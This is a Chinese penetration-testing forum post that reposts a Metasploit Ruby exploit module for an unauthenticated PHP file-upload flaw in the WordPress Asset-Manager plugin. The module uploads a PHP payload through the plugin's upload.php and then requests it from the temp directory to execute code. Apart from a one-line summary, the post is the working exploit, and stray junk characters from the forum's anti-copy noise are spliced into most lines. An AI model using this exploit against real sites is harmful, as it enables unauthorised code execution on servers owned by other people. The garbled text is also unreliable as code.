找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2045|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
5 I: ?2 j% _* ?9 p
) d- Q6 w0 y5 \0 e' ~5 s##/ H+ D" |7 \, p# }
# This file is part of the Metasploit Framework and may be subject to/ j+ ^; ]# X6 Y( w1 {, Y! p
# redistribution and commercial restrictions. Please see the Metasploit8 J$ C0 d% j$ c6 h
# Framework web site for more information on licensing and terms of use.1 x1 ?# |9 L- ?- p' Z
#   http://metasploit.com/framework/6 t; a9 S3 y* K% }* E9 M
##
% }. P3 w. p5 @$ b; N $ Q) B5 b; y1 z3 n
require 'msf/core'
! i( h1 e6 k( v- `) e0 M6 M* Trequire 'msf/core/exploit/php_exe'
$ w" [. V% L1 c* l. s9 ]6 x! @
1 I. M2 o! f4 Jclass Metasploit3 < Msf::Exploit::Remote
4 M/ t9 J5 b* u, H7 w' m  Rank = ExcellentRanking$ o0 |+ J# [8 D6 T' w
; k% E& W% O: B2 R- M+ E$ F
  include Msf::Exploit::Remote::HttpClient
$ E3 B3 U1 O5 E; d- _5 M  include Msf::Exploit:hpEXE; e8 S, u2 E; `- e# @8 i4 [

- L) P) K- \# v3 S: F  def initialize(info = {})/ U8 a* l/ ?8 s# d2 y1 U6 q
    super(update_info(info,
- c9 @$ h" K! O8 x/ E      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 T2 k0 b7 a& |6 e      'Description'    => %q{
3 F# _& z) T3 P' m8 J/ ?# Q4 w8 `        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress( F% m  b/ m6 ?* p
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a) ?* ^. p8 ~% }
        temp directory without authentication, which results in arbitrary code execution.4 ~9 w  g, x+ k/ ~# ]! v
      },  f5 ?/ L. A" _0 g' \& ?- l4 K. C
      'Author'         =>
; z5 y1 c3 A; r: o. q3 I4 Z% f% v        [1 B$ O4 ^9 j+ x8 ^. k# l
          'Sammy FORGIT', # initial discovery! `. z: K4 S8 D: `- k( S
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
' ?3 I+ B* u8 Z( G        ],1 W; X* e1 J3 {6 k
      'License'        => MSF_LICENSE,4 c  G: f/ A" U! y6 D" j3 V5 |
      'References'     =>
5 ^, L4 |7 P$ e0 a7 S% R        [
+ L: G* D3 ~2 L4 T          [ 'OSVDB', '82653' ],
. B* M3 |+ ]) I$ {  z& _. d8 o1 n& C          [ 'BID', '53809' ],$ ~5 n- f% p1 _! p4 J
          [ 'EDB', '18993' ]," b- i& `! w. h
          [ 'URL', 'http:// www.myhack58.com /' ]1 N* [9 A4 X* A0 ]3 m, g! L
        ],6 n3 V4 s& v& ^- z) f. l7 y0 J
      'Payload'       =>
& v% ?& \3 Z: ?  X1 Y: t) }& p+ C0 c        {7 @% f" v' Z; I" f0 A
          'BadChars' => "\x00",( H( H1 W, E" F8 R: l% j
        },
1 Q+ C: v0 C& Y+ v) z1 c6 t5 ?      'Platform'       => 'php',
2 p1 A* K. t& d9 G      'Arch'           => ARCH_PHP,) ~1 ^+ U7 v9 _# d7 U
      'Targets'        =>. H" _6 g8 t- M- x% p
        [- P, z& N9 i1 q  x0 N9 t
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],1 X& W; s% d# f9 P- V3 L% H0 \8 D6 ?
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
) ?3 M2 S' h+ }+ _% t2 F        ]," y% F7 R3 K8 d$ t0 B, w* T
      'DefaultTarget' => 0,
7 C3 t9 X# Y* G      'DisclosureDate' => 'May 26 2012')). c0 G/ D& E; F& |7 y

5 U2 E6 M1 ]8 J* @1 J    register_options(& ?' n( Q. g4 v4 Y4 N
      [
2 n$ M5 l$ n% u  u        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- p" M& [# S- U; q+ F* a' c      ], self.class)
! C; ^( d. \  G  |- {3 _& |  end7 |4 N/ J6 n: ?

9 t9 `& e) b+ u6 H1 z( z4 E+ l  def exploit* Q5 Q/ `+ z; g% T1 R
    uri =  target_uri.path
: n3 _5 ]! r- o- T/ c+ c( O    uri << '/' if uri[-1,1] != '/'# P/ u- y, Y+ u; R; ?: n' X* U& W
    peer = "#{rhost}:#{rport}"
3 U* ?- \, H" I1 H- n    payload_name = "#{rand_text_alpha(5)}.php"
+ X' S; J7 A% t. Z3 i0 F% P. q    php_payload = get_write_exec_payload(:unlink_self=>true)1 d, Q6 Q2 L/ i8 F- V) z
4 p- U7 Q' H' b6 E5 z
    data = Rex::MIME::Message.new- n/ Q7 A& ~: g# N
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")5 D3 y4 ^, f! d) j$ H) K) R
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ r9 o% M6 X/ x5 x& i; Y, u3 \- n3 U
  ^1 \& x7 s, }7 N, v  B+ s    print_status("#{peer} - Uploading payload #{payload_name}")4 k" W+ B% B5 t/ {3 p8 W
    res = send_request_cgi({
! S) _7 e: X/ F2 ?1 U      'method'  => 'POST',2 l( K2 x# F% Z, f+ T; P
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",1 P" F1 T$ T3 f7 q+ f
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",# y5 V9 }. B3 C; g
      'data'    => post_data$ P. @8 p* `$ \. L+ B( c
    })) D. x! y4 K8 C
/ Q/ }, @) L0 w5 U0 c7 O4 @
    if not res or res.code != 200 or res.body !~ /#{payload_name}/% q( ?$ a. W% r
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
- T9 M- k1 {1 H. b1 u" ~end) a1 \' _0 a5 S6 A4 D

" F8 \' j2 v8 Z6 H0 E    print_status("#{peer} - Executing payload #{payload_name}")- u* b8 K! \) W9 M- T
    res = send_request_raw({
, L7 m3 S4 g6 h      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",$ V. e5 Z, [8 I& w- j5 i
      'method'  => 'GET'
) E0 ~" s- Q7 M) @4 ^9 i- n, }5 e- [    }): ~! c7 T: j1 [# X9 J
5 E. ~/ ?6 T4 L: s$ {
    if res and res.code != 200; f# m: H- H- D& c6 z
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
6 G# S3 L( b* S8 `1 g    end; E: p: a3 ]5 |- j$ a9 }7 p* F
  end4 A7 N9 b- x) {0 e' P+ X/ {6 ?
end
9 Y% [8 u9 ~/ F5 U$ x  c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表